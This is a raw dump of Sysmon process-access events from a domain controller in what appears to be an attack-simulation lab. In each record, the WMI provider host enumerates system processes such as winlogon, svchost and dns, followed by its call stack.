RPCRT4.dll+111bc 10341000x80000000000000001697855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 